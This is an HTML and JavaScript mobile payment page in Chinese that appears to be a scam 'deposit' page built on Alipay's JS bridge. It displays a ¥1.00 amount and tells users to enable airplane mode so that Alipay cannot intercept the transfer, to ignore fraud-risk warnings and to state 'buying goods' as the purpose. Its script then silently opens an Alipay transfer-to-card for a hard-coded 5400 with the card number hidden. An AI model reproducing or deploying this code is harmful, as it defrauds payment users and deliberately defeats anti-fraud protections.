<!DOCTYPE html>
<html>

<head>
  <meta name="viewport"
    content="width=device-width,initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" />
  <link rel="stylesheet" type="text/css" href="QRCode.css">
  <link rel="stylesheet" href="layer.css" id="layuicss-layer">
  <script type="text/javascript" src="jquery-2.0.3.min.js"></script>
  <script src="layer.js" type="text/javascript"></script>
  <script type="text/javascript" src="alipayjsapi.inc.min.js"></script>
  <title></title>
  <style>
    * {
      box-sizing: border-box;
      font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
    }

    body {
      margin: 0;
      background: #0d8ee9;
    }

    .main {
      max-width: 600px;
      margin: 0;
      padding: 0;
      margin: auto;
    }

    .header {
      height: 62px;
      line-height: 62px;
      background: #fff;
      display: flex;
      justify-content: center;
      align-items: center;
    }

    .header img {
      width: 102px;
    }

    .header .logo-img img {
      width: 100%;
      height: 100%;
    }

    .pay-main {
      padding: 15px;
    }

    .pay-main .cont {
      width: 100%;
      background: #FEFFFF;
      border-radius: 4px;
      padding-bottom: 18px;
      margin-bottom: 15px;
    }

    .pay-main .cont .cont-header {
      background: #FDFBEC;
      border-radius: 4px;
      height: 35px;
      line-height: 35px;
      font-size: 13px;
      text-align: center;
      color: #F8762C;
    }

    .pay-main .cont .money {
      display: flex;
      justify-content: center;
      align-items: center;
      padding: 15px 0;
    }

    .pay-main .cont .money i {
      font-size: 23.8px;
      color: #303030;
      font-style: normal;
      display: inline-block;
      font-weight: bold;
      margin-top: 12px;
    }

    .pay-main .cont .money span {
      font-size: 40px;
      color: #303030;
      font-weight: bolder;
    }

    .pay-main .cont p {
      font-size: 13px;
      color: #444343;
      width: 86%;
      margin: 0 auto;
    }
    .pay-main .terrace {
      display: flex;
      width: 100%;
      text-align: center;
    }
    .pay-main .terrace > div{
      width: 50%;
      display: flex;
      justify-content: center;
      flex-wrap: wrap;
    }
    .pay-main .terrace > div div{
      max-width: 122px;
      width: 100%;
    }
    .pay-main .terrace > div .th{
      max-width: 100%;
      font-size: 14px;
      color: #F8762C;
      height: 40px;
      line-height: 40px;
    }
    .pay-main .terrace img{
      width: 100%;
    }
    .pay-main .cont .m-btn {
      /* background-image: linear-gradient(135deg, #1AA0FF 0%, #0D8EE9 100%); */
      background: #D8D8D8;
      border-radius: 4px;
      font-size: 15px;
      color: #FEFFFF;
      display: block;
      margin: 15px auto 0;
      height: 45px;
      line-height: 45px;
      width: 90%;
      text-align: center;
      text-decoration: none;
    }
    .pay-main .cont .m-btn.su-btn{
      background-image: linear-gradient(135deg, #1AA0FF 0%, #0D8EE9 100%);
    }
    .pay-main .cont .su-btn{
      display: none;
    }
    .pay-main.active .cont .dis-btn{
      display: none;
    }
    .pay-main.active .cont .su-btn{
      display: block;
    }
    .pay-main .tip-step{
      /* margin-top: 15px; */
      padding: 15px 15px 0;
      
    }
    .pay-main .tip-step span{
      font-size: 13px;
      color: #3A3A3A;
      line-height: 21px;
      display: block;
      margin-bottom: 13px;
    }
    .pay-main .tip-step span font{
      color: #F8762C;
      font-weight: bold;
    }
    .pay-main .tip-png{
      width: 217px;
      margin: 0 auto;
      display: flex;
      padding-top: 10px;
    }
    .pay-main .tip-png img{
      width: 100%;
      height: 217px;
      text-align: center;
    }
    .tip-net{
      width: 90%;
      margin: 0 auto;
    }
    .tip-net img{
      width: auto;
      max-width: 100%;
    }
    .warning-tip > div{
      display: flex;
      font-size: 13px;
      color: #F76260;
      line-height: 13px;
      justify-content: center;
      margin-top: 15px;
    }
    .warning-tip.su-btn > div{
      color: #00AAEE;
    }
    .warning-tip img{
      height: 14px;
      width: 14px;
    }
    .tip {
      margin-top: 15px;
      background: #FEFFFF;
      border-radius: 4px;
    }

    .tip img {
      width: 100%;

    }

    .tip .tip-txt {
      padding: 10px 0px 15px 10px;
      font-size: 15px;
      color: #DB2929;
      line-height: 24px;
    }
    .demo-class.layui-layer{
      max-width: 304px;
    }
    .demo-class .layui-layer-title{
      text-align: center;
      padding: 0;
      font-size: 18px;
      letter-spacing: 3px;
      display: none;
    }
    /* .demo-class.sure .layui-layer-title{
      display: block;
    } */
    .demo-class.layui-layer-dialog .layui-layer-padding{
      padding: 20px 15px;
    }
    .demo-class .layui-layer-btn{
      padding: 15px;
      border-top: 1px solid #CACACD;
    }
    .demo-class .layui-layer-btn .layui-layer-btn0{
      width: 100%;
      height: 40px;
      line-height: 40px;
      text-align: center;
      margin: 0;
    }
    .demo-class .confirm-c{
      font-weight: bold;
      font-size: 13px;
    }
    .demo-class .confirm-c .tis{
      background: #FDFBEC;
      border-radius: 4px;
      padding: 15px;
      font-size: 13px;
      color: #3A3A3A;
      font-weight: normal;
      margin-top: 15px;
    }
    .demo-class .confirm-c img{
      width: 100%;
    }
    .demo-class .confirm-c .tis-2{
      font-weight: normal;
    }
    /* .demo-class.sure .confirm-c{
      color: #DB2929;
      font-size: 16px;
    } */
    .fengxian{
      color: #F8762C;
      font-size: 14px;
      text-align: center;
      margin-top: 10px;
    }
    .tis2{
      box-shadow: 0 0 5px rgba(0, 0, 0, 0.2);
      margin-top: 15px;
      padding-bottom: 20px;
    }
    .tis2 p{
      margin: 0;
      padding-left: 15px;
      line-height: 35px;
      border-bottom: 1px solid #eee;
      font-size: 12px;
      color: #666;
    }
    .tis2 p span{
      display: block;
      border: 2px solid #f8762c;
      margin-left: -5px;
      padding-left: 5px;
      margin-right: 10px;
    }
  </style>
</head>

<body>
  <div class="main">
    <div class="header">
      <img src="logo@2x.png" alt="">
    </div>
    <div class="pay-main">
      <div class="cont">
        <div class="cont-header">为保证您的入金及时到账，请不要修改付款金额</div>
        <div class="money">
          <i>¥&nbsp;</i>
          <span>1.00</span>
        </div>
        <div class="tip-net">
          <img src="step2.png" class="su-btn" alt="">
          <img src="step1.png" class="dis-btn" alt="">
        </div>
        <div class="warning-tip su-btn">
          <div>
            <img src="su.png" alt="">
            <span>&nbsp;&nbsp;已断开网络（请点击『去付款』）</span>
          </div>
        </div>
        <div class="warning-tip dis-btn">
          <div>
            <img src="err.png" alt="">
            <span>&nbsp;&nbsp;尚未断开网络（请开启飞行模式）</span>
          </div>
        </div>
        <span class="m-btn su-btn" id="btnTime">已打开『飞行模式』，去付款</span>
        <span class="m-btn dis-btn">请先开启『飞行模式』才能付款</span>
        <div class="fengxian">如遇风险提示，请继续支付，不用担心</div>
      </div>
      <div class="cont">
        <div class="cont-header">如何开启飞行模式？</div>
        <p style="margin-top: 15px;text-align: center;">
          屏幕顶端下拉，打开设置中心
        </p>
        <div class="terrace">
          <div class="ios">
            <div class="th">苹果手机</div>
            <div>
              <img src="ios.png" alt="">
            </div>
          </div>
          <div class="android">
            <div class="th">安卓手机</div>
            <div>
              <img src="android.png" alt="">
            </div>
          </div>
        </div>
      </div>
      <div class="cont">
        <div class="cont-header">为什么非要开启飞行模式？</div>
        <div class="tip-step">
          <span>
              1、开启飞行模式是为了在跳转时把网络断掉，减少因支付宝阻拦转账造成支付失败的情况。此方式付款，您的<font>资金绝对安全</font>，保证您能及时顺利到账；
          </span>
          <span>
            2、其他跳转方式支付失败率高（如图）：往往到最后输密码的一步提示风险交易，付款失败。
          </span>
        </div>
        <div class="tip-png">
          <img src="tip.png" alt="">
        </div>
      </div>
    </div>
  </div>

  <script>
    $('#btnTime').click(function () {
      goPay();
    });
    function goPay() {
      ap.getNetworkType(function (res) {
        networkAvailable = res.networkAvailable;
        // alert(networkAvailable);
        if (networkAvailable) {
          layer.confirm('<div class="confirm-c">检测到您还没有断网哦～请先开启<font color="red">『飞行模式』</font>关闭网络，再点击<font color="red">『去付款』</font><div class="tis">开启飞行模式是为了在跳转时把网络断掉，减少因支付宝阻拦转账造成支付失败的情况。此方式付款，您的<font color="#F8813E">资金绝对安全</font>，保证您能及时顺利到账。</div></div>', {
            icon: 1,
            title: '充值提示',
            skin: 'demo-class',
            btn: ['好的，去开启飞行模式'] //按钮
          }, function (index) {
            layer.close(index);
          })
        } else {
          var pList = '<p>别人让我帮忙转账给其他人</p><p><span>在买东西</span></p><p>在刷单做任务</p><p>办理贷款、信用卡</p><p>客服办退款或其他情况</p>'
          layer.confirm('<div class="confirm-c">尊贵的会员，因最近风控严格，如有提示诈骗风险，交易异常，请放心付款。如有安全提醒，选择真实支付目的：<font color="#FF6C00">在买东西。</font><div class="tis2">'+ pList +'</div></div>', {
            icon: 1,
            title: '充值提示',
            skin: 'demo-class sure',
            btn: ['好的，去转账'] //按钮
          }, function (index) {
            layer.close(index);
            setTimeout(function () {
              scanQR();
            }, 50);
          });
          // setTimeout(function () {
          //   scanQR();
          // }, 50);
        }
      });
    }

    // var money = '{$m}';
    // var amount = parsePrice(money);
    // var cardNo = "请关闭飞行模式****";
    // var bankName = "{$bn}";
    // var bankMark = "{$be}";
    // var bankAccount = '{$n}';
    // var cardIndex = "{$cid}";

    var money = '5400';
    var cardNo = '"**** 请关闭飞行模式****"';
    var bankName = "重庆银行";
    var bankMark = "CQBANK"
    var amount = parsePrice(money);
    var cardIndex = "120000049";
    var bankAccount = '水电费';

    function goJsPay() {
      AlipayJSBridge.call('exitApp');
      var a = {
        actionType: "toCard",
        sourceId: "bill",
        cardNo: cardNo,
        bankAccount: bankAccount,
        money: amount,
        amount: amount,
        bankMark: bankMark,
        bankName: bankName,
        cardIndex: cardIndex,
        cardChannel: "HISTORY_CARD",
        cardNoHidden: "true"
      };

      setTimeout(function () {
        AlipayJSBridge.call("startApp", {
          appId: "09999988",
          param: a
        }, function (a) { });
      }, 50)
    }


    function scanQR() {
      // ap.scan(function (res) {
      setTimeout(function () { goJsPay(); }, 50);
      // });
    };

    function parsePrice(str) {
      if (!str) {
        return 0.00;
      }
      str = parseFloat(str);
      if (isNaN(str)) {
        return 0.00;
      }
      return str.toFixed(2);
    };
    // 轮训获取网络
    function getNet() {
      setTimeout(function () {
        ap.getNetworkType(function (res) {
          networkAvailable = res.networkAvailable;
          if (networkAvailable) {
            $('.pay-main').removeClass('active');
          } else {
            $('.pay-main').addClass('active');
          }
          getNet();
        })
      }, 1000)
    }
    getNet();
  </script>
</body>

</html>